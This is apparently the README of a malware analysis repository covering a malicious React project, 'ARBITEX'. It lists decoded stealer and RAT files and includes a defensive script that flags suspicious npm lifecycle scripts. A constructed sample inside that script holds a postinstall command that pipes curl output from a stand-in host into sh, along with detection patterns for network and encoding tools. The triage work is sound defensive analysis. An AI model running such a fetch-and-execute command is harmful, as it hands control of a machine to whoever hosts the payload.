
Malware Analysis of ARBITEX React App Project


ARBITEX-Malware-Analysis

This is the malware analysis of the ARBITEX React App project, which is mentioned in my LinkedIn post and explained in depth in my blog post.

Note

I've commented out the package.json start script; do not run this project on your system. Use an isolated or sandboxed environment for analyzing this malware.
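The note above matters because an npm script, not the React code, is what hands control to the malware. Before opening a suspicious project, the first static triage step is to read every entry under `scripts` in package.json and flag the ones that auto-run on install or that shell out to something a front-end build has no reason to run. The script below is an added example written for this README; it is not code from the ARBITEX project or from the analysis files listed here. The embedded package.json is constructed for the example, and the assumption that a `start` script launching a `setupTests.js` file is an indicator follows from this repo's layout (setupTests.js is the original malware script and the start script was commented out), which the README implies but does not state outright.

```javascript
// Added example: static triage of npm "scripts" entries in a package.json.
// No file or network access; the package.json text is passed in as a string.

// Constructed sample for the example (NOT the real ARBITEX package.json).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "sample-react-app",
  scripts: {
    start: "node src/setupTests.js && react-scripts start",
    build: "react-scripts build",
    test: "react-scripts test",
    postinstall:
      "node -e \"require('child_process').exec('curl http://example.invalid/p | sh')\"",
  },
});

// Lifecycle hooks npm runs on its own during `npm install`; nobody has to
// type `npm run <hook>` for these to execute.
const AUTO_RUN_HOOKS = new Set([
  "preinstall", "install", "postinstall", "prepare", "prepublish",
]);

// Command fragments that are out of place in a React app's scripts.
// "runs-test-setup-file" is the ARBITEX-style indicator (assumption, see lead-in):
// setupTests.js is meant to be loaded by the test runner, never by `start`.
const SUSPICIOUS_PATTERNS = [
  { name: "node-eval", re: /\bnode\s+-e\b/ },
  { name: "child_process", re: /child_process/ },
  { name: "network-fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { name: "powershell", re: /\bpowershell\b/i },
  { name: "base64", re: /\b(base64|atob)\b/i },
  { name: "runs-test-setup-file", re: /\bnode\s+[^&|;]*setupTests\.(js|ts)\b/ },
];

// Returns one finding per suspicious script: { hook, cmd, reasons[] }.
// Scripts that trigger nothing are omitted, so an empty array means "clean
// by these heuristics", not "safe".
function findSuspiciousScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const [hook, cmd] of Object.entries(scripts)) {
    const reasons = [];
    if (AUTO_RUN_HOOKS.has(hook)) reasons.push("auto-run-lifecycle-hook");
    for (const p of SUSPICIOUS_PATTERNS) {
      if (p.re.test(cmd)) reasons.push(p.name);
    }
    if (reasons.length > 0) findings.push({ hook, cmd, reasons });
  }
  return findings;
}

// Human-readable report, one line per finding.
function formatReport(findings) {
  return findings.map(
    (f) => `[${f.reasons.join(",")}] scripts.${f.hook}: ${f.cmd}`
  );
}

// Run against the constructed sample.
const sampleFindings = findSuspiciousScripts(SAMPLE_PACKAGE_JSON);
for (const line of formatReport(sampleFindings)) console.log(line);
```

To use it on a real repo, read package.json from the cloned tree inside the sandbox and pass its contents to `findSuspiciousScripts`; the heuristics are deliberately loose, so treat a hit as "read this script by hand", and treat `postinstall` or `preinstall` hits as the ones that would have fired without anyone running `npm start` at all.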

Original Malware Script

setupTests.js

Decoded Malware Files

setupTestsDecoded.js : Deobfuscated and unminified version of the main malware script

store.node : Windows DLL used to decrypt the encrypted_key, which is in turn used to decrypt the browser store values

p2.zip : Python executable zip file, bundled for the case where Python is not installed on the Windows host

.npl : Obfuscated Python malware

.nplDecoded.py : Deobfuscated Python malware

.n2/GetSystemInfoPayloadDecoded.py : Python malware used to steal system information and geolocation information

.n2/GetBrowserPasswordsAndCreditCardsDataDecoded.py : Python malware used to steal browser passwords and credit card data

.n2/RemoteAccessTrojan.py : Python RAT used to steal system files and execute commands on the system